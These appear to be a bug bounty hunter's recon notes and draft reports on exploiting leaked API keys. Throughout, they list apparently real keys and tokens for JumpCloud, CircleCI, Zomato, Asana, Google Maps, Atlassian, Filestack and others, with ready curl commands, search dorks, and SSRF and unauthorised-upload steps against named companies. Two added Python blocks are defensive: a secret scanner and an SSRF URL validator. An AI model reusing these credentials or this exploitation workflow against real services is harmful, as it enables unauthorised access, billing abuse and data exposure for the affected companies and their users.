GitHub Recon: keys, tokens, access keys etc.
What you can do with keys?
1. Read the API docs
2. Look for key-exchange code samples: curl, python, bash
IMP: curl
3. API docs: keywords (Secret_auth_token)
4. Exchange keys
IMP
1. Secret key without the access key = no exploit
2. If no API docs = no exploit, no bug
3. Key should have some privilege = info disclosure, or actions: delete, revoke, upload etc.
https://github.com/streaak/keyhacks
JumpCloud API key: 8819ada3791d0ee0e1d71587ff321253a5401a3a
1. curl -X GET \
https://console.jumpcloud.com/api/organizations/ \
-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
-H 'x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a'
2. curl -X GET https://console.jumpcloud.com/api/applications \
-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
-H 'x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a'
3. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a" "https://console.jumpcloud.com/api/systems"
4. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a" "https://console.jumpcloud.com/api/systemusers"
5. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a" "https://console.jumpcloud.com/api/applications"
site:pastebin.com | site:paste2.org | site:pastehtml.com | site:slexy.org |
site:snipplr.com | site:snipt.net | site:textsnip.com | site:bitpaste.app |
site:justpaste.it | site:heypasteit.com | site:hastebin.com | site:dpaste.org |
site:dpaste.com | site:codepad.org | site:jsitor.com | site:codepen.io |
site:jsfiddle.net | site:dotnetfiddle.net | site:phpfiddle.org |
site:ide.geeksforgeeks.org | site:repl.it | site:ideone.com | site:paste.debian.net
| site:paste.org | site:paste.org.ru | site:codebeautify.org | site:codeshare.io |
site:trello.com "circletoken"
CircleCI token: 25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af
curl 'https://circleci.com/api/v1.1/me?circle-token=25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af'
curl --request GET \
--url https://circleci.com/api/v2/me \
--header 'authorization: 25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af'
Steps:
1. GitHub, source code, JS files etc.
2. Any token or API key
3. Look for the API docs
4. Look for a curl request
5. Exchange keys
6. Exploit done
https://app.swaggerhub.com/apis-docs/Vivek-Raj/zomato-api/1.0.0#/Restaurant%20Reviews/get_reviews
Zomato key: 399720f6f904f106e162cd2bd0011a6f
Process
1. GitHub: "jumpcloud.com" api key
2. Got the API key
3. Look for the API docs: jumpcloud api docs curl
4. Look for: curl request
5. Exchange / replace the key in the command
6. Run it in CMD / Ubuntu: exploit done
Exploits
Third party: Zomato, Google Maps API, WordPress
Company service: Uber API
Detection: key name, service name
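Detection by key name and by service name, as an added example (not code from this page or from any vendor it names): a small scanner that applies both rules to constructed sample lines shaped like the leaks collected above (a committed .env, a Weglot init call, a filepicker config, a Google Maps key in JS, a CircleCI URL, a bunq sandbox response). The key-name list and the key-shape patterns are assumptions drawn from this page, not vendor specifications, and every sample value is constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample lines (not real keys), shaped like the places this page
# finds leaks: a committed .env, a JS init call, a JSON config, a curl, an API response.
SAMPLE_LINES = [
    "JUMPCLOUD_API_KEY=0123456789abcdef0123456789abcdef01234567",
    "Weglot.initialize({ api_key: 'wg_0123456789abcdef0123456789abcdef' });",
    '"filepicker_conversion_url":"https://process.example.com","filepicker_key":"CONSTRUCTEDKEY00000000"',
    "var mapsKey = 'AIzaSyCONSTRUCTEDKEY0123456789abcdefghi';",
    "curl https://circleci.com/api/v1.1/me?circle-token=fedcba9876543210fedcba9876543210fedcba98",
    '{"Response":[{"ApiKey":{"api_key":"sandbox_' + "0" * 56 + '"}}]}',
    'const color = "#ffffff"; // not a secret',
]

# Rule 1, key name: names this page shows secrets stored under (api_key,
# x-api-key, filepicker_key, circle-token ...). The list is a hypothetical starting point.
NAME_RE = re.compile(
    r"(?i)\b([a-z_\-]*(?:api[_-]?key|secret|token|filepicker_key))\b"
    r"[\"']?\s*[:=]\s*[\"']?([A-Za-z0-9_\-/]{16,})"
)

# Rule 2, service name from key shape. Prefixes and lengths are assumed from the
# sample keys on this page, not taken from vendor documentation.
SERVICE_RES = {
    "google-api-key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "weglot": re.compile(r"\bwg_[0-9a-f]{32,}\b"),
    "bunq-sandbox": re.compile(r"\bsandbox_[0-9a-f]{40,}\b"),
    "circleci-token": re.compile(r"circle-token=([0-9a-f]{40})\b"),
}

@dataclass(frozen=True)
class Finding:
    line_no: int
    reason: str    # "service format" or "key name"
    label: str     # inferred service, or the key name as written (lowercased)
    redacted: str  # never log the full secret: first and last 4 chars only

def redact(value: str) -> str:
    return value[:4] + "..." + value[-4:] if len(value) > 12 else "****"

def scan_line(line_no: int, line: str) -> list[Finding]:
    # Keyed by the raw value so a secret matched by both rules is reported
    # once, with the more specific service label winning.
    found: dict[str, Finding] = {}
    for service, rx in SERVICE_RES.items():
        for m in rx.finditer(line):
            value = m.group(m.lastindex or 0)
            found[value] = Finding(line_no, "service format", service, redact(value))
    for m in NAME_RE.finditer(line):
        name, value = m.group(1), m.group(2)
        found.setdefault(value, Finding(line_no, "key name", name.lower(), redact(value)))
    return list(found.values())

def scan(lines) -> list[Finding]:
    findings: list[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        findings.extend(scan_line(line_no, line))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.label} via {f.reason}, value {f.redacted}: rotate it")
```

Run it over a pre-commit diff or over fetched JS files; the maps line shows why the shape rule is needed (its variable name matches no key-name pattern), and any hit means rotate the key and purge it from history, as the GitHub guidance quoted later on this page says.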
BASE URL: curl -H "Authorization: 0/ca581dda1b807b654e09b05bd8a8c70" \
https://app.asana.com/api/1.0/users/me
Weglot.initialize({
api_key: 'wg_3fa15532f2f69c44a683790307a57b3c7'
});
curl -X POST \
'https://api.weglot.com/translate?api_key=wg_3fa15532f2f69c44a683790307a57b3c7' \
-H 'Content-Type: application/json' \
-d '{
"l_from":"en",
"l_to":"fr",
"request_url":"https://www.re-cap.com/",
"words":[
{"w":"This is a blue car", "t": 1},
{"w":"This is a black car", "t": 1}
]
}'
curl https://app.asana.com/api/1.0/users/me \
-H "Authorization: Bearer 0/ca581dda1b807b654e09b05bd8a8c70"
"filepicker_conversion_url":"https://process.fs.grailed.com","filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"
curl -X POST \
-d url="https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_demonstration_1.png/420px-PNG_transparency_demonstration_1.png" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
curl -X POST --data-binary @test.txt --header "Content-Type: text/plain" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
Google query:
grailed.com api docs curl
paytm api docs curl
segment api docs curl
paypal api docs curl
curl --request GET \
--url https://apidojo-hm-hennes-mauritz-v1.p.rapidapi.com/regions/list \
--header 'X-RapidAPI-Host: apidojo-hm-hennes-mauritz-v1.p.rapidapi.com' \
--header 'X-RapidAPI-Key: 7e06e2fe93msh93a651f74b7e29fp17c6e7jsna95be08dc858'
token : E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7
curl -v -X GET "https://api-m.sandbox.paypal.com/v1/invoicing/invoices?page=3&page_size=4&total_count_required=true" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7"
curl -u KEY:SECRET 'https://amplitude.com/api/2/events/segmentation?e={"event_type":"_active"}&start=20170301&end=20170321'
curl --header "X-Zomato-API-Key: 7749b19667964b87a3efc739e254ada2" "https://api.zomato.com/v1/search.json?city_id=1"
curl -X GET --header "Accept: application/json" --header "user-key:" "https://developers.zomato.com/api/v2.1/restaurant?res_id=ccd"
curl -X GET --header "Accept: application/json" --header "user-key: 6aebfe02b9c7820ae965ccf5769fea39" "https://developers.zomato.com/api/v2.1/restaurant?res_id=1"
1. Look for the key name or service name
2. Look for the target's API docs: curl
3. Look for the curl command and exchange keys
4. Gather data or exploit
curl -X POST \
-d url="https://events.eurid.eu/media/upload/tedex_2012-2790.jpg" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
API key exploit led to blind SSRF, an EXIF issue, and third-party image upload.
Hi team,
Aditya here, found an information disclosure bug. Please look into it.
Description: Disclosed API key to list user information
Developers are increasingly relying on cloud-based tools to automate building
code and deployment of services, which is leading to far more instances of
accidental public exposure of sensitive data.
There are a lot of things that hackers can do with a developer’s cloud
credentials: spin up hundreds of servers, take down servers, “redistribute” DNS and
load balancers, and much more. Accidental public exposure of credentials such as
API keys, OAuth tokens, and app secrets is a mistake that can be made by both
inexperienced and seasoned developers, particularly when it comes to source
control. Right now there are thousands of exposed API keys on GitHub that can be
found in just minutes using GitHub code search; these can be found in seconds by
bots.
Consider Your Data Compromised When You Push a Commit
When it comes to accidental exposure of API keys and other sensitive data on
GitHub, GitHub states very clearly on the advanced Git help page that “once you
have pushed a commit to GitHub, you should consider any data it contains to be
compromised. If you committed a password, change it! If you committed a key,
generate a new one.” GitHub provides detailed instructions on how to purge a file
from a GitHub repository’s history.
Key Found URL:
https://github.com/tggrsmth/jumpcloudapp/blob/35cc63f0fcd874ffd0dde0d1194c891da78b5981/.env
Exploit:
curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7" "https://console.jumpcloud.com/api/systems"
curl -L -X POST 'https://amplitude.com/api/2/lookup_table/:name' \
-u API_KEY:SECRET_KEY \
-F 'file=@"/path/to/file.csv"'
Zomato key: 399720f6f904f106e162cd2bd0011a6f
curl --location --request GET 'https://developers.zomato.com/api/v2.1/categories' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'
curl --location --request GET 'https://developers.zomato.com/api/v2.1/cities?q=pune&lat=-77596659.4184915&lon=-77596659.4184915&city_ids=*&count=56625527' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'
curl --location --request GET 'https://developers.zomato.com/api/v2.1/cuisines?lat=-77596659.4184915&lon=-77596659.4184915&city_id=*' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'
1. "zomato.com" api key
2. zomato api docs curl
3. curl
4. exchange keys
Steps:
1. Search API DOCS : grailed api docs curl , filepicker api docs curl
Exploit
Upload any image
EXIF metadata is not stripped
curl -X GET "https://www.filestackapi.com/api/file/vVHvaeQTTNKeJybLFdQN/metadata"
https://cdn.fs.grailed.com/vVHvaeQTTNKeJybLFdQN
curl -X POST \
-d url="https://w0xbntim85vtgvu72su9hdji49azyo.burpcollaborator.net/aditya.png" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
"filepicker_conversion_url":"https://process.fs.grailed.com","filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"
site:documenter.getpostman.com inurl:"walmart"
curl --location --request GET 'https://developers.zomato.com/api/v2.1/categories' \
--header 'user-key: 46327a3a1c3db149805d3ba2cf8a4abb'
curl --location --request GET 'https://developers.zomato.com/api/v2.1/restaurant?res_id=56625527' \
--header 'user-key: 46327a3a1c3db149805d3ba2cf8a4abb'
Hello Team,
I, Aditya Shende, found a critical vulnerability; I hope you remember me ;).
Title: API config endpoint disclosed a sensitive key which leads to unauthorised file
upload in the grailed domain.
Description:
“APIs tend to expose endpoints that handle object identifiers, creating a wide
attack surface Level Access Control issue. Object-level authorization checks should
be considered in every function that accesses a data source using an input from the
user.” - OWASP*
Since APIs enable access to objects, if authorization is broken there is a wide
attack area. Thus, authorization to API-accessible objects must be secured.
Solution: Use an API gateway and implement object-level authorization checks.
Require access tokens to permit access, and only allow access to those with the
proper authorization credentials.
Steps:
1. Visit grailed.com/api/config
2. Search for the "key" and "url" keywords (remove quotes)
Info found:
"filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"
https://process.fs.grailed.com
Exploit:
curl -X POST \
-d url="https://www.3cx.com/wp-content/uploads/2020/08/3-signs-been-hacked.jpg" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
In this I fetched a file from another website to upload it.
Using this, any attacker or bad person can upload a file into your website, which may
lead to impersonating profiles or reputation issues.
There are multiple attacks we can perform using keys, but I chose file upload and
this bug is really CRITICAL so patch it ASAP.
POC attached ;
================
Hello team,
Aditya here, I found keys in one of your domains which is vulnerable.
Description: An attacker can exploit the exposure of your API key by making
requests to the Google Maps API that appear to be coming from your app. A group of
malicious users could spam the API to use up your app's "courtesy" bandwidth, or to
run up your bandwidth bill if you have billing enabled for the Google Maps API. If
you (or Google) are keeping a close eye on your bandwidth usage, you could
partially defend against such an attack by revoking and replacing the maps API key
when your app's (apparent) usage of the maps API spikes.
Exploits:
API key is vulnerable for Place Details API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Nearby Search-Places API! Here is the PoC link which
can be used directly via browser:
https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Text Search-Places API! Here is the PoC link which can
be used directly via browser:
https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Places Photo API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/place/photo?
maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrky
se7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWg
TK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key=AIzaS
yAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Directions API! Here is the PoC link which can be used
directly via browser:
https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Geocode API! Here is the PoC link which can be used
directly via browser:
https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Distance Matrix API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/distancematrix/json?
units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-
73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-
73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-
73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-
73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-
73.6334271%7C40.598566%2C-73.7527626&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Find Place From Text API! Here is the PoC link which
can be used directly via browser:
https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Autocomplete API! Here is the PoC link which can be
used directly via browser:
https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
API key is vulnerable for Elevation API! Here is the PoC link which can be used
directly via browser:
https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ
Impact: costing companies extra money and in some cases DoS.
Identified cost: $5 per 1000 requests
POC:
========================================
Hello team,
Aditya here, found a security issue where I got some endpoints and I got an API key in
the response while exploiting.
URL: https://public-api.sandbox.bunq.com/v1/sandbox-user
Exploit :
curl https://public-api.sandbox.bunq.com/v1/sandbox-user -X POST \
--header "Content-Type: application/json" --header "Cache-Control: none" \
--header "User-Agent: curl-request" --header "X-Bunq-Client-Request-Id: $(date)randomId" \
--header "X-Bunq-Language: nl_NL" --header "X-Bunq-Region: nl_NL" \
--header "X-Bunq-Geolocation: 0 0 0 0 000"
Response: {"Response":[{"ApiKey":{"api_key":"sandbox_3ddd71f6415f3cb9f6d8fb30e3ad14fc6f0706aeaa7409f1e1e99474"}}]}
1. API docs
2. curl request
3. Exchange URLs and keys
4. CMD or Ubuntu = exploit
IMP
1. Check the API endpoint privilege
2. Think out of the box
cat sub.txt | waybackurls | grep '\.js'
Summary: Atlassian token disclosure and crafting nested queries with an internal port
scan as SSRF may lead to application-level DoS
Steps to reproduce:
1. Use this in cmd: curl -v https://onduo.com --user admin@onduo.atlassian.net:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
2. I got this token from Burp Suite spidering of onduo.atlassian.net
3. Now run this: curl -v https://onduo.com:22 --user admin@onduo.atlassian.net:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
We can see the time delay on port change: 80 and 8080 give an instant response but port
22 gives a late response.
Browser/OS: NA/ Firefox
Attack scenario:
A successful SSRF attack can often result in unauthorized actions or access to data
within the organization, either in the vulnerable application itself or on other
back-end systems that the application can communicate with. In some situations, the
SSRF vulnerability might allow an attacker to perform arbitrary command execution.
An SSRF exploit that causes connections to external third-party systems might
result in malicious onward attacks that appear to originate from the organization
hosting the vulnerable application, leading to potential legal liabilities and
reputational damage.
When we check the command on ports 80 and 8080 it gives a speedy response but on port 22 it
gives a late response. It means 22 is closed. If a hacker performs this attack like a port
scan then this may lead to DoS.
POC: https://drive.google.com/file/d/1jXxCH80e9EwGjHWMGC716iB1Z6l4_xsw/view?usp=sharing
Hello team,
As I mentioned in the 2nd step, I got the token while crawling the whole web app; or else
the simpler method is to check the source code on the following endpoint:
https://onduollc.atlassian.net/projects
Steps to reproduce issue:
1. Check source code of https://onduollc.atlassian.net/projects
2. Search for "atlassian-token"
3. The Atlassian token can be used for crafting nested queries, but I escalated this to an
SSRF port scan
4. Syntax for crafting nested queries: curl -v https://mainhost.com --user anyuser@target.atlassian.net:atlassian_token_here_lout
Exploit command:
1. On port 80
curl -v https://onduo.com:80 --user admin@onduollc.atlassian.net:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It crafted queries and gives us a valid response; we can say an instant response.
image.png
2. On port 22
curl -v https://onduo.com:22 --user admin@onduollc.atlassian.net:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It gave me a response after 1 min 45 seconds: "failed to connect on port 22"
image.png
3. On port 443
curl -v https://onduo.com:443 --user admin@onduollc.atlassian.net:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It gave me an instant response with crafted queries.
PORT443.gif
An interesting part is when I change the host on the port which we check.
Command is: curl -v https://enroll.onduo.com:443 --user admin@onduollc.atlassian.net:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It gave me the following information:
__FIREBASE_API_KEY__ = 'AIzaSyCq7ZPizDqVfo0D8y8fTfHIDqJ5Qq7FvFc';
__FIREBASE_PROJECT_ID__ = 'diabetes-management'; __FIREBASE_AUTH_DOMAIN__ =
'diabetes-management.firebaseapp.com'; __FIREBASE_DATABASE_URL__ =
'https:\/\/diabetes-management.firebaseio.com'; __FIREBASE_STORAGE_BUCKET__ =
'diabetes-management.appspot.com'; __FIREBASE_MESSAGING_SENDER_ID__ =
'719737211384'
Also I tried the same command with port 3306 and it takes a long time.
Impact: The first part is, it gives an instant response on an open port, and when I try
with a closed port like 3306 or 22 it takes long to craft queries.
So if a hacker tries the same attack on closed ports, the command will force the server to
craft queries; because of the closed port it's not going to craft them. Performing the same
attack on closed ports to craft queries will keep the server engaged and this may lead
to a DoS attack.
Changing the host to enroll.onduo.com with port 443 to perform SSRF was giving sensitive
information about Firebase stuff.
If you've any queries feel free to ask
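The two SSRF-shaped findings on this page (the filestack store-from-URL call fetching whatever URL the caller supplies, and the proxied requests above whose response time reveals whether port 22 or 3306 is open) share one mitigation: validate a user-supplied URL before the server ever connects to it. The following is an added example, not code from the page or from any vendor it names; it assumes a fetch-by-URL feature, an allowlist of ports, and a constructed in-memory resolver (FAKE_DNS) so it runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # a fetch-by-URL feature has no business reaching 22 or 3306

# Constructed resolver stand-in so the example runs offline. A real service
# resolves with the system resolver and must check every returned address,
# because an attacker-controlled name can mix a public and an internal address.
FAKE_DNS = {
    "images.example.com": ["93.184.216.34"],
    "intranet.example.com": ["10.0.0.5"],
    "mixed.example.net": ["93.184.216.35", "127.0.0.1"],
}


def is_public_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_fetch_url(url: str, resolve=lambda host: FAKE_DNS.get(host, [])):
    """Return (ok, reason). Every rejection happens before any connection is made."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = [str(ipaddress.ip_address(host))]  # literal IP, no lookup needed
    except ValueError:
        addrs = resolve(host)
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if not is_public_ip(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for u in ("https://images.example.com/photo.png", "https://images.example.com:22/",
              "https://intranet.example.com/", "http://[::1]/"):
        print(u, "->", validate_fetch_url(u))
```

The outbound request that follows a successful check still needs a short connect timeout, so a closed port fails in seconds instead of holding a worker for the 1 min 45 seconds the report above describes.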
TASK:
grailed.com | key | exploit